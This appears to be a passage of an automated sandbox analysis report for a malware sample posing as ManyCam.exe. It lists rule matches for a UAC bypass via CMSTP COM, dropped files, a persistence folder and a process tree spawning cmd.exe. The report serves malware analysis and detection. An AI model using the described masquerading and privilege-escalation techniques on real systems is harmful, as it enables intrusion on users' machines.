                  Source: 14.2.cmd.exe.4acca00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 21.2.cmd.exe.56b26cd.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.cmd.exe.4b126cd.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6B903C: wcscpy,CreateFileW,CloseHandle,wcscpy,wcscpy,CreateDirectoryW,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00007FF6EF6B903C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C50080_2_00007FF6EF6C5008
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C25500_2_00007FF6EF6C2550
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D353C0_2_00007FF6EF6D353C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6BADE80_2_00007FF6EF6BADE8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D23F00_2_00007FF6EF6D23F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6B42C40_2_00007FF6EF6B42C4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C90600_2_00007FF6EF6C9060
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C88580_2_00007FF6EF6C8858
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6B903C0_2_00007FF6EF6B903C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C01200_2_00007FF6EF6C0120
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6B78E40_2_00007FF6EF6B78E4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6DCF940_2_00007FF6EF6DCF94
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C97900_2_00007FF6EF6C9790
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6E9F680_2_00007FF6EF6E9F68
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6E67600_2_00007FF6EF6E6760
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6E3F440_2_00007FF6EF6E3F44
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6B2E600_2_00007FF6EF6B2E60
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6CD6500_2_00007FF6EF6CD650
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6B370C0_2_00007FF6EF6B370C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C47040_2_00007FF6EF6C4704
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D0DAC0_2_00007FF6EF6D0DAC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C2D780_2_00007FF6EF6C2D78
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6CCE2C0_2_00007FF6EF6CCE2C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6B55F80_2_00007FF6EF6B55F8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6B7C4C0_2_00007FF6EF6B7C4C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6DCD180_2_00007FF6EF6DCD18
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6E0CDC0_2_00007FF6EF6E0CDC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C33940_2_00007FF6EF6C3394
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C93780_2_00007FF6EF6C9378
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6E62900_2_00007FF6EF6E6290
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C9AFC0_2_00007FF6EF6C9AFC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C71AC0_2_00007FF6EF6C71AC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6B5A300_2_00007FF6EF6B5A30
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6C39C40_2_00007FF6EF6C39C4
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_0050EC901_2_0050EC90
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB31B01_2_00BB31B0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BD619B1_2_00BD619B
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BDB1E01_2_00BDB1E0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BD01C01_2_00BD01C0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BD91C01_2_00BD91C0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BCB1301_2_00BCB130
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB72001_2_00BB7200
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BA83801_2_00BA8380
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BBE3401_2_00BBE340
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB74301_2_00BB7430
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BC14101_2_00BC1410
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BD640B1_2_00BD640B
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BC35A01_2_00BC35A0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB55F01_2_00BB55F0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BC85E21_2_00BC85E2
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB65601_2_00BB6560
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BBE6801_2_00BBE680
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BC26F01_2_00BC26F0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BC16C01_2_00BC16C0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BC76601_2_00BC7660
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BD96501_2_00BD9650
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BD57D01_2_00BD57D0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BCB7201_2_00BCB720
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BD87401_2_00BD8740
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BA78C01_2_00BA78C0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB69861_2_00BB6986
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BA09301_2_00BA0930
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB79201_2_00BB7920
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BC9AF01_2_00BC9AF0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BCBAE01_2_00BCBAE0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BC7A101_2_00BC7A10
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BDABB01_2_00BDABB0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BD9B001_2_00BD9B00
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BD8CF01_2_00BD8CF0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BCEC101_2_00BCEC10
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BD5C101_2_00BD5C10
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB3C401_2_00BB3C40
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB5E3B1_2_00BB5E3B
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB4E301_2_00BB4E30
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BB6E101_2_00BB6E10
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BC7FB01_2_00BC7FB0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BBEF901_2_00BBEF90
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BCFF901_2_00BCFF90
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BACFF01_2_00BACFF0
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_0050EC903_2_0050EC90
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B861803_2_00B86180
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B861D93_2_00B861D9
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B762A03_2_00B762A0
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B862493_2_00B86249
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BC03F03_2_00BC03F0
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BB64403_2_00BB6440
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B866993_2_00B86699
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B9A6303_2_00B9A630
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B5A6403_2_00B5A640
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B866403_2_00B86640
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B847803_2_00B84780
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B8A7103_2_00B8A710
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BD27103_2_00BD2710
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B867093_2_00B86709
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BA28003_2_00BA2800
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B969803_2_00B96980
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BAA9703_2_00BAA970
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BAE9703_2_00BAE970
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B52A903_2_00B52A90
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B9CAD03_2_00B9CAD0
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B88B403_2_00B88B40
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B72C903_2_00B72C90
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BBEC203_2_00BBEC20
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B86E603_2_00B86E60
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BBAFF03_2_00BBAFF0
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B9AFC03_2_00B9AFC0
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B96F523_2_00B96F52
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B96F543_2_00B96F54
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B870B03_2_00B870B0
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BAB0D83_2_00BAB0D8
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BAB1773_2_00BAB177
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B951603_2_00B95160
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BBD2F03_2_00BBD2F0
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B952C73_2_00B952C7
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00B8B2203_2_00B8B220
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00BD12403_2_00BD1240
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe 7C4EB51A737A81C163F95B50EC54518B82FCF91389D0560E855F3E26CEC07282
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: String function: 00416740 appears 60 times
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: String function: 004B77A0 appears 101 times
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: String function: 004B76D0 appears 36 times
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: String function: 00BC2CB0 appears 125 times
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: String function: 0047BCF0 appears 141 times
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: String function: 00BBB420 appears 79 times
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: String function: 00BBB4C0 appears 178 times
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: String function: 00BDD586 appears 35 times
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: String function: 00416740 appears 90 times
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: String function: 004B77A0 appears 101 times
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: String function: 004B76D0 appears 36 times
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: String function: 0041A3B0 appears 36 times
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: String function: 00BDD568 appears 313 times
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: String function: 0047BCF0 appears 141 times
                  Source: CrashRpt.dll.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: CrashRpt.dll.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: Rzu_channel_debug.exe.5.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
                  Source: dawfefqddjbx.21.drStatic PE information: Number of sections : 12 > 10
                  Source: ydoicpxmibx.5.drStatic PE information: Number of sections : 12 > 10
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameManyCam.exeN vs file.exe
                  Source: 14.2.cmd.exe.2b207f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.2.cmd.exe.29f4a08.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 23.2.Rzu_channel_debug.exe.2707a20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.cmd.exe.5629a00.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 23.2.Rzu_channel_debug.exe.274d6ed.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 21.2.cmd.exe.56b1acd.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 21.2.cmd.exe.566ca00.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.2.cmd.exe.4b11acd.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.cmd.exe.566eacd.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.Rzu_channel_debug.exe.2640a20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.Rzu_channel_debug.exe.26866ed.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.Rzu_channel_debug.exe.2685aed.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.cmd.exe.566f6cd.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 23.2.Rzu_channel_debug.exe.274caed.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.2.cmd.exe.4acca00.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 21.2.cmd.exe.56b26cd.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.2.cmd.exe.4b126cd.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: classification engineClassification label: mal100.spyw.expl.evad.winEXE@28/25@1/1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6B8AD4 GetLastError,FormatMessageW,0_2_00007FF6EF6B8AD4
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_004B2100 CoCreateInstance,1_2_004B2100
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D0C0C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF6EF6D0C0C
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeFile created: C:\Users\user\AppData\Roaming\EH_Monitor_testJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeReversingLabs: Detection: 18%
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeProcess created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeProcess created: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeProcess created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeProcess created: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"Jump to behavior
